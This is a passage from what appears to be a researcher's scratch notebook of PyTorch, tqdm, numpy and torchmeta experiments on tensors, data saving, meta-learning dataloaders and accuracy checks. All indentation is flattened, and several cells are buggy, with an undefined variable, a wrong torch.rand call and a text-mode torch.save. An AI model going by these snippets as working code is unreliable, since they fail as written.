print(args.data_root.name)
print('miniImagenet' in args.data_root.name)
# %%
## sampling N classes for len(meta-set)
# In sampling without replacement, each sample unit of
# the population has only one chance to be selected in the sample.
# because you are NOT replacing what you removed.
import random
N = 5
len_meta_set = 64
sample = random.sample(range(0, len_meta_set), N)
print(sample)
for i, n in enumerate(sample):
print(f'i={i}\nn={n}\n')
# %%
# iterator https://www.programiz.com/python-programming/iterator
class Counter:
def __init__(self, max=0):
self.max = max # returns up to and including that number
def __iter__(self):
self.n = 0
return self
def __next__(self):
if self.n <= self.max:
current_count = self.n
self.n += 1
print(f'current_count = {current_count}')
print(f'self.n = {self.n}')
print(self.n is current_count)
return current_count
else:
raise StopIteration
## test it
counter = iter(Counter(max=0))
for count in counter:
print(f'count = {count}')
# %%
from tqdm import tqdm
print(tqdm)
lst = range(3)
print(type(lst))
with tqdm(iter(lst), total=5) as tlist:
print(f'tlist = {type(tlist)}')
for i in tlist:
print(i)
# %%
from tqdm import tqdm
class Plus2:
def __init__(self, max=0):
self.max = max # returns up to and including that number
def __iter__(self):
self.it = 0
self.tot = 0
return self
def __next__(self):
if self.it <= self.max:
self.it += 1
self.tot += 2
return self.tot
else:
raise StopIteration
def __len__(self):
return self.max
##
counter = iter(Plus2(max=int(100000)))
with tqdm(counter, total=len(counter)) as tqcounter:
for idx, pow2 in enumerate(tqcounter):
print()
print(f'idx = {idx}')
print(f'powd2 = {pow2}')
pass
# %%
from tqdm import tqdm
for i in tqdm(range(int(9e6))):
pass
# %%
from tqdm import tqdm
import time
with tqdm(range(int(5))) as trange:
for i in trange:
print(f'\ni = {i}')
print('done\n')
time.sleep(1)
pass
# %%
# zip, it aligns elements in one list to elements in the other
l1 = [0, 1, 2]
l2 = ['a', 'b', 'c']
print(list(zip(l1, l2)))
# %%
from tqdm import tqdm
import time
lst = range(10000000)
total = 2
with tqdm(lst, total=total) as tlst:
i = 0
for _, element in enumerate(tlst):
print(f'\n->i = {i}\n')
time.sleep(0.2)
i += 1
if i >= total:
break
print('\n--> DONE \a')
# %%
from tqdm import tqdm
import time
lst = range(10000000)
total = 2
with tqdm(lst, total=total) as tlst:
for idx, element in enumerate(tlst):
print(f'\n->idx = {idx}\n')
time.sleep(0.2)
if idx >= total:
break
print('\n--> DONE \a')
# %%
from tqdm import tqdm
import time
lst = range(10000000)
total = 2
with tqdm(range(total)) as tcounter:
lst = iter(lst)
for idx, element in enumerate(tcounter):
print(f'\n->idx = {idx}\n')
time.sleep(0.2)
print('\n--> DONE \a')
# %%
# Question: Do detached() tensors track their own gradients seperately?
# Ans: Yes!
# https://discuss.pytorch.org/t/why-is-the-clone-operation-part-of-the-computation-graph-is-it-even-differentiable/67054/11
import torch
a = torch.tensor([2.0], requires_grad=True)
b = a.detach()
b.requires_grad = True
la = (5.0 - a) ** 2
la.backward()
print(f'a.grad = {a.grad}')
lb = (6.0 - b) ** 2
lb.backward()
print(f'b.grad = {b.grad}')
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
params = OrderedDict([
('fc0', nn.Linear(in_features=4, out_features=4)),
('ReLU0', nn.ReLU()),
('fc1', nn.Linear(in_features=4, out_features=1))
])
mdl = nn.Sequential(params)
print(params)
print(mdl._parameters)
print(params == params)
print(mdl._parameters == params)
print(mdl._modules)
print()
for name, w in mdl.named_parameters():
print(name, w.norm(2))
print()
# mdl._modules['fc0'] = nn.Linear(10,11)
mdl._modules[0]
for name, w in mdl.named_parameters():
print(name, w.norm(2))
# %%
## Q: are parameters are in computation graph?
# import torch
# import torch.nn as nn
# # from torchviz import make_dot
#
# from collections import OrderedDict
#
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# print(fc0.weight)
# print(fc0.bias)
# print(fc0.weight.to_tens)
# print()
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# make_dot(l, {'x': x, 'y': y})
# make_dot(l)
# %%
'''
expand
'''
import torch
x = torch.randn([2, 3, 4, 5])
# h_0 of shape (num_layers * num_directions, batch, hidden_size)
h = torch.randn([1, 4, 8])
x_mean = x.mean()
print(x_mean.size())
print(x_mean)
x = x_mean.expand_as(h)
print(x.size())
print(x)
# %%
import torch
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
print(device)
type(device)
print(device == 'cpu')
device.type
# %%
# THIS WORKS
from torch.utils.tensorboard import SummaryWriter
from pathlib import Path
# log_dir (string) – Save directory location.
# Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
tb = SummaryWriter()
tb.add_scalar('loss', 111)
# %%
from torch.utils.tensorboard import SummaryWriter
from pathlib import Path
def CURRENT_DATETIME_HOSTNAME(comment=''):
# if not log_dir:
import socket
import os
from datetime import datetime
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
return Path(log_dir)
# log_dir (string) – Save directory location.
# Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
# tensorboard --logdir=runs
log_dir = (Path('~/automl-meta-learning/') / CURRENT_DATETIME_HOSTNAME()).expanduser()
print(log_dir)
tb = SummaryWriter(log_dir=log_dir)
tb.add_scalar('loss', 15)
# %%
# download mini-imagenet automatically
# from torchvision.utils import download_and_extract_archive
import torchvision.utils as utils
print(utils)
# print(download_and_extract_archive)
# %%
# torch concat, https://pytorch.org/docs/stable/torch.html#torch.cat
# Concatenates the given sequence of seq tensors in the given dimension.
# All tensors must either have the same shape (except in the concatenating dimension) or be empty.
import torch
g1 = torch.randn(3, 2)
g2 = torch.randn(4, 2)
g3 = torch.randn(4, 2, 3)
grads = [g1, g2]
print(g1.view(-1).size())
print(g2.view(-1).size())
print(g3.view(-1).size())
# print(g3.view(-1))
grads = torch.cat(grads, dim=0)
print(grads)
print(grads.size())
print(grads.mean())
print(grads.std())
# torch stack, https://pytorch.org/docs/stable/torch.html#torch.stack
# Concatenates sequence of tensors along a new dimension.
# All tensors need to be of the same size.
# torch.stack([g1,g2], dim=0)
# %%
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
a_detached = a.detach()
print(a_detached.is_leaf)
a_detached_sum = a.sum()
print(c.is_leaf)
d = c.detach()
print(d.is_leaf)
# %%
import torch
from types import SimpleNamespace
from pathlib import Path
from pprint import pprint
x = torch.empty([1, 2, 3])
print(x.size())
args = SimpleNamespace()
args.data_root = "~/automl-meta-learning/data/miniImagenet"
# n1313361300001299.jpg
args.data_root = Path(args.data_root).expanduser()
# %%
import torch
CHW = 3, 12, 12
x = torch.randn(CHW)
y = torch.randn(CHW)
new = [x, y]
new = torch.stack(new)
print(x.size())
print(new.size())
# %%
print('a');
print('b')
# %%
# conver list to tensor
import torch
x = torch.tensor([1, 2, 3.])
print(x)
# %%
from torchvision.transforms import Compose, Resize, ToTensor
import torchmeta
from torchmeta.datasets.helpers import miniimagenet
from pathlib import Path
from types import SimpleNamespace
from tqdm import tqdm
## get args
args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
## get meta-batch loader
train_transform = Compose([Resize(84), ToTensor()])
dataset = miniimagenet(
args.data_root,
ways=args.n_classes,
shots=args.k_shot,
test_shots=args.k_eval,
meta_split='train',
download=False)
dataloader = torchmeta.utils.data.BatchMetaDataLoader(
dataset,
batch_size=args.meta_batch_size,
num_workers=args.n_workers)
with tqdm(dataset):
print(f'len(dataloader)= {len(dataloader)}')
for episode, batch in enumerate(dataloader):
print(f'episode = {episode}')
train_inputs, train_labels = batch["train"]
print(f'train_labels[0] = {train_labels[0]}')
print(f'train_inputs.size() = {train_inputs.size()}')
pass
if episode >= args.episodes:
break
# %%
# zip tensors
import torch
x = torch.tensor([1., 2., 3.])
y = torch.tensor([1, 2, 3])
print(list(zip(x, y)))
xx = torch.randn(2, 3, 84, 84)
yy = torch.randn(2, 3, 32, 32)
print(len(list(zip(xx, yy))))
# %%
x = 2
print(x)
# %%
## sinusioid function
print('Starting Sinusioid cell')
from torchmeta.toy import Sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
# from tqdm import tqdm
batch_size = 16
shots = 5
test_shots = 15
# dataset = torchmeta.toy.helpers.sinusoid(shots=shots, test_shots=tes_shots)
metaset_dataset = Sinusoid(num_samples_per_task=shots + test_shots, num_tasks=100, noise_std=None)
splitter_metset_dataset = ClassSplitter(
metaset_dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
dataloader = BatchMetaDataLoader(splitter_metset_dataset, batch_size=batch_size, num_workers=4)
print(f'batch_size = {batch_size}')
print(f'len(dataset) = {len(metaset_dataset)}')
print(f'len(dataloader) = {len(dataloader)}\n')
for batch_idx, batch in enumerate(dataloader):
print(f'batch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
if batch_idx >= 1: # halt after 2 iterations
break
print('DONE\a')
# %%
## notes of torchmeta
from pathlib import Path
import torchmeta
# meta-set: creates collection of data-sets, D_meta = {D_1, ... Dn}
print('\n-- Sinusoid(MetaDataset)')
metaset_sinusoid = torchmeta.toy.Sinusoid(num_samples_per_task=10, num_tasks=1_000_000, noise_std=None)
print(f'type(metaset_sinusoid) = {type(metaset_sinusoid)}')
print(f'len(metaset_sinusoid) = {len(metaset_sinusoid)}')
print(f'metaset_sinusoid = {metaset_sinusoid}')
# this is still a data set but helps implement forming D_i
# i.e. the N-way, K-shot tasks/datasets we need.
print('\n-- MiniImagenet(CombinationMetaDataset)')
data_path = Path('~/data').expanduser()
metaset_miniimagenet = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True,
download=True)
print(f'type(metaset_miniimagenet) = {type(metaset_miniimagenet)}')
print(f'len(metaset_miniimagenet) = {len(metaset_miniimagenet)}')
print(f'metaset_miniimagenet = {metaset_miniimagenet}')
# Splits the data-sets inside the meta-set into support/train & query/test sets
dataset = metaset_miniimagenet
dataset = torchmeta.transforms.ClassSplitter(dataset, num_train_per_class=1, num_test_per_class=15, shuffle=True)
print(dataset)
# %%
import torch
import torch.nn as nn
import numpy as np
x = np.random.uniform()
x = torch.rand()
print(x)
l = nn.Linear(1, 1)
y = l(x)
print(y)
# %%
# saving tensors for my data set
import torch
import torch.nn as nn
from collections import OrderedDict
from pathlib import Path
# N x's of size D=1 in an interval
Din, Dout = 3, 2
num_samples = 5
lb, ub = -1, 1
X = (ub - lb) * torch.rand([num_samples, Din]) + lb # rand gives uniform in [0,1) range
# N y's of size D=1 (from output of NN)
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
# fill cnn with Gaussian
mu1, std1 = 5, 7.5
f.f1.weight.data.normal_(mu1, std1)
f.f1.bias.data.normal_(mu1, std1)
# get outputs
Y = f(X)
print(Y)
# save tensors and cnn
# https://stackoverflow.com/questions/1466000/difference-between-modes-a-a-w-w-and-r-in-built-in-open-function
db = {
'X': X,
'Y': Y
}
path = Path(f'~/data/tmp/SinData_mu1{mu1}_std1{std1}/').expanduser()
path.mkdir(parents=True, exist_ok=True)
with open(path / 'db', 'w') as file: # create file and truncate to length 0, only writing allowed
torch.save(db, file)
# %%
# saving data in numpy
import numpy as np
import pickle
from pathlib import Path
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
lb, ub = -1, 1
num_samples = 5
x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
y = x ** 2 + x + 2
# using save (to npy), savez (to npz)
np.save(path / 'x', x)
np.save(path / 'y', y)
np.savez(path / 'db', x=x, y=y)
with open(path / 'db.pkl', 'wb') as db_file:
pickle.dump(obj={'x': x, 'y': y}, file=db_file)
## using loading npy, npz files
x_loaded = np.load(path / 'x.npy')
y_load = np.load(path / 'y.npy')
db = np.load(path / 'db.npz')
with open(path / 'db.pkl', 'rb') as db_file:
db_pkl = pickle.load(db_file)
print(x is x_loaded)
print(x == x_loaded)
print(x == db['x'])
print(x == db_pkl['x'])
print('done')
# %%
import numpy as np
from pathlib import Path
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
lb, ub = -1, 1
num_samples = 5
x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
y = x ** 2 + x + 2
np.save(path / 'x', x)
np.save(path / 'y', y)
x_loaded = np.load(path / 'x.npy')
y_load = np.load(path / 'y.npy')
print(x is x_loaded) # False
print(x == x_loaded) # [[ True True True True True]]
# %%
# saving torch tensors
import torch
import torch.nn as nn
import torchvision
from pathlib import Path
from collections import OrderedDict
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
tensor_a = torch.rand(2, 3)
tensor_b = torch.rand(1, 3)
db = {'a': tensor_a, 'b': tensor_b}
torch.save(db, path / 'torch_db')
loaded = torch.load(path / 'torch_db')
print(loaded['a'] == tensor_a)
print(loaded['b'] == tensor_b)
# testing if ToTensor() screws things up
lb, ub = -1, 1
N, Din, Dout = 3, 1, 1
x = torch.distributions.Uniform(low=lb, high=ub).sample((N, Din))
print(x)
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
y = f(x)
transform = torchvision.transforms.transforms.ToTensor()
y_proc = transform(y)
print(y_proc)
# %%
# merge dict
# union dictionaries, https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression-in-python
d1 = {'a': 1, 'b': 2.5}
d2 = {'b': 2, 'c': 3, 'd': 4}
d = {**d1, **d2}
# duplicates resolved in favour of d2
print(d)
# %%
# generating uniform variables
import numpy as np
num_samples = 3
Din = 1
lb, ub = -1, 1
xn = np.random.uniform(low=lb, high=ub, size=(num_samples, Din))
print(xn)
import torch
sampler = torch.distributions.Uniform(low=lb, high=ub)
r = sampler.sample((num_samples, Din))
print(r)
r2 = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
print(r2)
# process input
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
Y = f(r2)
print(Y)
# %%
# sampling from normal distribution in torch
import torch
num_samples = 3
Din = 1
mu, std = 0, 1
x = torch.distributions.normal.Normal(loc=mu, scale=std).sample((num_samples, Din))
print(x)
# %%
# creating data and running through a nn and saving it
import torch
import torch.nn as nn
from pathlib import Path
from collections import OrderedDict
import numpy as np
import pickle
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
num_samples = 3
Din, Dout = 1, 1
lb, ub = -1, 1
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
y = f(x)
# save data torch to numpy
x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
np.savez(path / 'db', x=x_np, y=y_np)
print(x_np)
# save model
with open('db_saving_seq', 'wb') as file:
pickle.dump({'f': f}, file)
# load model
with open('db_saving_seq', 'rb') as file:
db = pickle.load(file)
f2 = db['f']
# test that it outputs the right thing
y2 = f2(x)
y_eq_y2 = y == y2
print(y_eq_y2)
db2 = {'f': f, 'x': x, 'y': y}
torch.save(db2, path / 'db_f_x_y')
print('Done')
db3 = torch.load(path / 'db_f_x_y')
f3 = db3['f']
x3 = db3['x']
y3 = db3['y']
yy3 = f3(x3)
y_eq_y3 = y == y3
print(y_eq_y3)
y_eq_yy3 = y == yy3
print(y_eq_yy3)
# %%
# test for saving everything with torch.save
import torch
import torch.nn as nn
from pathlib import Path
from collections import OrderedDict
import numpy as np
import pickle
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
num_samples = 3
Din, Dout = 1, 1
lb, ub = -1, 1
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
y = f(x)
# save data torch to numpy
x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
db2 = {'f': f, 'x': x_np, 'y': y_np}
torch.save(db2, path / 'db_f_x_y')
# np.savetxt(path / 'output.csv', y_np) # for csv
db3 = torch.load(path / 'db_f_x_y')
f3 = db3['f']
x3 = db3['x']
y3 = db3['y']
xx = torch.tensor(x3)
yy3 = f3(xx)
print(yy3)
# %%
# my saving code for synthetic data, nvm using torch.save for everything
# import torch
# import torch.nn as nn
#
# from pathlib import Path
# from collections import OrderedDict
#
# import numpy as np
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din,Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# # save data torch to numpy
# x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# np.savez(path / 'data', x=x_np, y=y_np)
#
# # save model
# torch.save(f,path / 'f')
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
num_samples = 3
Din, Dout = 1, 1
lb, ub = -1, 1
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
hidden_dim = [(Din, 20), (20, 20), (20, 20), (20, 20), (20, Dout)]
f = nn.Sequential(OrderedDict([
('fc1;l1', nn.Linear(hidden_dim[0][0], hidden_dim[0][1])),
('relu2', nn.ReLU()),
('fc2;l1', nn.Linear(hidden_dim[1][0], hidden_dim[1][1])),
('relu2', nn.ReLU()),
('fc3;l1', nn.Linear(hidden_dim[2][0], hidden_dim[2][1])),
('relu3', nn.ReLU()),
('fc4;l1', nn.Linear(hidden_dim[3][0], hidden_dim[3][1])),
('relu4', nn.ReLU()),
('fc5;final;l2', nn.Linear(hidden_dim[4][0], hidden_dim[4][1]))
]))
y = f(x)
print(y)
section_label = [1] * 4 + [2]
print(section_label)
# %%
# get list of paths to task
# https://stackoverflow.com/questions/973473/getting-a-list-of-all-subdirectories-in-the-current-directory
# https://stackoverflow.com/a/44228436/1601580
from pathlib import Path
from glob import glob
meta_split = 'train'
data_path = Path('~/data/LS/debug/fully_connected_NN_mu1_1.0_std1_2.5_mu2_1.0_std2_0.5/')
data_path = (data_path / meta_split).expanduser()
# with path lib
tasks_folder = [f for f in data_path.iterdir() if f.is_dir()]
assert ('f_avg' not in tasks_folder)
len_folder = len(tasks_folder)
print(len_folder)
print(tasks_folder)
print()
# with glob
p = str(data_path) + '/*/'
print(p)
tasks_folder = glob(p)
assert ('f_avg' not in tasks_folder)
len_folder = len(tasks_folder)
print(len_folder)
print(tasks_folder)
print()
# with glob and negation
print(set(glob(str(data_path / "f_avg"))))
tasks_folder = set(glob(str(data_path / '*'))) - set(glob(str(data_path / "f_avg")))
assert ('f_avg' not in tasks_folder)
len_folder = len(tasks_folder)
print(len_folder)
print(tasks_folder)
print()
# %%
# looping through metasets
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
from torchmeta.toy import Sinusoid
from tqdm import tqdm
# get data set
dataset = Sinusoid(num_samples_per_task=25, num_tasks=30)
shots, test_shots = 5, 15
# get metaset
metaset = ClassSplitter(
dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
# get meta-dataloader
batch_size = 16
num_workers = 0
meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
epochs = 2
print(f'batch_size = {batch_size}')
print(f'len(metaset) = {len(metaset)}')
print(f'len(meta_dataloader) = {len(meta_dataloader)}')
with tqdm(range(epochs)) as tepochs:
for epoch in tepochs:
for batch_idx, batch in enumerate(meta_dataloader):
print(f'\nbatch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
# %%
from tqdm import tqdm
import time
with tqdm(range(5)) as trange:
for t in trange:
print(t)
time.sleep(1)
# %%
import torch
import torch.nn as nn
l1 = torch.tensor([1, 2, 3.]) ** 0.5
l2 = torch.tensor([0, 0, 0.0])
mse = nn.MSELoss()
loss = mse(l1, l2)
print(loss)
# %%
import numpy as np
x = np.arange(0, 10)
print(x)
print(x.max())
print(x.min())
print(x.mean())
print(np.median(x))
# %%
x = torch.randn(3)
print(x)
print(x.argmax(-1))
# %%
# testing accuracy function
# https://discuss.pytorch.org/t/calculating-accuracy-of-the-current-minibatch/4308/11
# https://stackoverflow.com/questions/51503851/calculate-the-accuracy-every-epoch-in-pytorch
import torch
import torch.nn as nn
D = 1
true = torch.tensor([0, 1, 0, 1, 1]).reshape(5, 1)
print(f'true.size() = {true.size()}')
batch_size = true.size(0)
print(f'batch_size = {batch_size}')
x = torch.randn(batch_size, D)
print(f'x = {x}')
print(f'x.size() = {x.size()}')
mdl = nn.Linear(D, 1)
logit = mdl(x)
_, pred = torch.max(logit.data, 1)
print(f'logit = {logit}')
print(f'pred = {pred}')
print(f'true = {true}')
acc = (true == pred).sum().item()
print(f'acc = {acc}')
# %%
# https://towardsdatascience.com/understanding-dimensions-in-pytorch-6edf9972d3be
# dimension
# https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/4?u=brando_miranda
"""
Dimension reduction. It collapses/reduces a specific dimension by selecting an element from that dimension to be
reduced.
Consider x is 3D tensor. x.sum(1) converts x into a tensor that is 2D using an element from D1 elements in
the 1th dimension. Thus:
x.sum(1) = x[i,k] = op(x[i,:,k]) = op(x[i,0,k],...,x[i,D1,k])
the key is to realize that we need 3 indices to select a single element. So if we use only 2 (because we are collapsing)
then we have D1 number of elements possible left that those two indices might indicate. So from only 2 indices we get a
set that we need to specify how to select. This is where the op we are using is used for and selects from this set.
In theory if we want to collapse many indices we need to indicate how we are going to allow indexing from a smaller set
of indices (using the remaining set that we'd usually need).
"""
import torch
x = torch.tensor([
[1, 2, 3],
[4, 5, 6]
])
print(f'x.size() = {x.size()}')
# sum the 0th dimension (rows). So we get a bunch of colums that have the rows added together.
x0 = x.sum(0)
print(x0)
# sum the 1th dimension (columns)
x1 = x.sum(1)
print(x1)
x_1 = x.sum(-1)
print(x_1)
x0 = x.max(0)
print(x0.values)
y = torch.tensor([[
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[17, 18, 19, 20],
[21, 22, 23, 24]]])
print(y)
# into the screen [1, 13]
print(y[:, 0, 0])
# columns [1, 5, 9]
print(y[0, :, 0])
# rows [1, 2, 3, 4]
print(y[0, 0, :])
# for each remaining index, select the largest value in the "screen" dimension
y0 = y.max(0)
print(y0.values)
# %%
# understanding making label predictions
# https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/3?u=brando_miranda
def calc_accuracy(mdl, X, Y):
# reduce/collapse the classification dimension according to max op
# resulting in most likely label
max_vals, max_indices = mdl(X).max(1)
# assumes the first dimension is batch size
n = max_indices.size(0) # index 0 for extracting the # of elements
# calulate acc (note .item() to do float division)
acc = (max_indices == Y).sum().item() / n
return acc
import torch
import torch.nn as nn
# data dimension [batch-size, D]
D, Dout = 1, 5
batch_size = 16
x = torch.randn(batch_size, D)
y = torch.randint(low=0, high=Dout, size=(batch_size,))
mdl = nn.Linear(D, Dout)
logits = mdl(x)
print(f'y.size() = {y.size()}')
# removes the 1th dimension with a max, which is the classification layer
# which means it returns the most likely label. Also, note you need to choose .indices since you want to return the
# position of where the most likely label is (not it's raw logit value)
pred = logits.max(1).indices
print(pred)
print('--- preds vs truth ---')
print(f'predictions = {pred}')
print(f'y = {y}')
acc = (pred == y).sum().item() / pred.size(0)
print(acc)
print(calc_accuracy(mdl, x, y))
# %%
# https://discuss.pytorch.org/t/runtimeerror-element-0-of-variables-does-not-require-grad-and-does-not-have-a-grad-fn/11074/20
import torch
import torch.nn as nn
x = torch.randn(1)
mdl = nn.Linear(1, 1)
y = mdl(x)
print(mdl.weight)
print(y)
# %%
# https://discuss.pytorch.org/t/how-to-get-the-module-names-of-nn-sequential/39682
# looping through modules but get the one with a specific name
import torch
import torch.nn as nn
from collections import OrderedDict
params = OrderedDict([
('fc0', nn.Linear(in_features=4, out_features=4)),
('ReLU0', nn.ReLU()),
('fc1L:final', nn.Linear(in_features=4, out_features=1))
])
mdl = nn.Sequential(params)
# throws error
# mdl['fc0']
for m in mdl.children():
print(m)
print()
for m in mdl.modules():
print(m)
print()
for name, m in mdl.named_modules():
print(name)
print(m)
print()
for name, m in mdl.named_children():
print(name)
print(m)
# %%
# apply mdl to x until the final layer, then return the embeding
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# Din, Dout = 1, 1
# H = 10
#
# modules = OrderedDict([
# ('fc0', nn.Linear(in_features=Din, out_features=H)),
# ('ReLU0', nn.ReLU()),
#
# ('fc1', nn.Linear(in_features=H, out_features=H)),
# ('ReLU1', nn.ReLU()),
#
# ('fc2', nn.Linear(in_features=H, out_features=H)),
# ('ReLU2', nn.ReLU()),
#
# ('fc3', nn.Linear(in_features=H, out_features=H)),
# ('ReLU3', nn.ReLU()),
#
# ('fc4L:final', nn.Linear(in_features=H, out_features=Dout))
# ])
#
# mdl = nn.Sequential(modules)
#
# out = x
# for name, m in self.base_model.named_children():
# if 'final' in name:
# # return out
# break
# out = m(out)
#
# print(out.size())
# %%
# initializing a constant weight net
# https://discuss.pytorch.org/t/how-to-add-appropriate-noise-to-a-neural-network-with-constant-weights-so-that-back-propagation-training-works/93411
# import torch
# [layer.reset_parameters() for layer in base_model.children() if hasattr(layer, 'reset_parameters')]
# model = nn.Linear(1, 1)
# model_copy = copy.deepcopy(model)
# %%
print('start')
# f_avg: PLinReg vs MAML
import numpy as np
from matplotlib import pyplot as plt
from pathlib import Path
datas_std = [0.1, 0.125, 0.1875, 0.2]
pl = [2.3078539778125768e-07,
1.9997889411762922e-07,
2.729681222011256e-07,
3.2532371115080884e-07]
pl_stds = [1.4852212316567463e-08,
5.090588920661132e-09,
1.1424832554909115e-08,
5.058656213138166e-08]
maml = [3.309504692539563e-07,
4.1058904888091606e-06,
6.8326703386053605e-06,
7.4616147721799645e-06]
maml_stds = [4.039131189060566e-08,
3.66839089258494e-08,
9.20683484136399e-08,
9.789292209743077e-08]
# fig = plt.figure()
fig, ax = plt.subplots(nrows=1, ncols=1)
ax.set_title('MAML vs Pre-Trained embedding with Linear Regression')
x = datas_std
ax.errorbar(x, pl, yerr=pl_stds, label='PLinReg', marker='o')
ax.errorbar(x, maml, yerr=maml_stds, label='MAML', marker='o')
ax.plot()
ax.legend()
ax.set_xlabel('std (of FNN Data set)')
ax.set_ylabel('meta-test loss (MSE)')
plt.show()
# path = Path('~/ultimate-utils/plot').expanduser()
# fig.savefig(path)
print('done \a')
# %%
# Torch-meta miniImagenet
# loop through meta-batches of this data set, print the size, make sure it's the size you exepct
import torchmeta
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
# from torchmeta.toy import Sinusoid
from tqdm import tqdm
# dataset = Sinusoid(num_samples_per_task=100, num_tasks=20)
dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True, download=True)
print(f'type(metaset_miniimagenet) = {type(dataset)}')
print(f'len(metaset_miniimagenet) = {len(dataset)}')
shots, test_shots = 5, 15
# get metaset
metaset = ClassSplitter(
dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
# get meta-dataloader
batch_size = 16
num_workers = 0
meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
epochs = 2
print(f'batch_size = {batch_size}')
print(f'len(metaset) = {len(metaset)}')
print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
with tqdm(range(epochs)) as tepochs:
for epoch in tepochs:
print(f'\n[epoch={epoch}]')
for batch_idx, batch in enumerate(meta_dataloader):
print(f'batch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
print()
# %%
import torch
x = torch.tensor([1., 2, 3])
print(x.mean())
print(x * x)
print(x @ x)
print(x.matmul(x))
# x.mm(x) weird error
# %%
import torch
x = torch.randn(12, 20)
y = torch.randn(20, 30)
out = x @ y
print(out.size())
# %%
# https://www.youtube.com/watch?v=46RjXawJQgg&t=1493s
from pathlib import Path
from pandas import read_csv
read_csv(Path())
# %%
print('hello-world')
xx = 2
print(xx)
print(' ')
##
print('end!')
# %%
# let's see how big the random values from the normal are
import torch
D = 8
w = torch.tensor([0.1] * D)
print(f'w.size() = {w.size()}')
mu = torch.zeros(w.size())
std = w * 1.5e-2 # two decimal places and a little more
noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
print('--- noise ')
print(noise.size())
print(noise)
w += noise
print('--- w')
print(w.size())
print(w)
# %%
# editing parameters in pytorch in place without error: https://discuss.pytorch.org/t/how-are-layer-weights-and-biases-initialized-by-default/13073/41
import torch
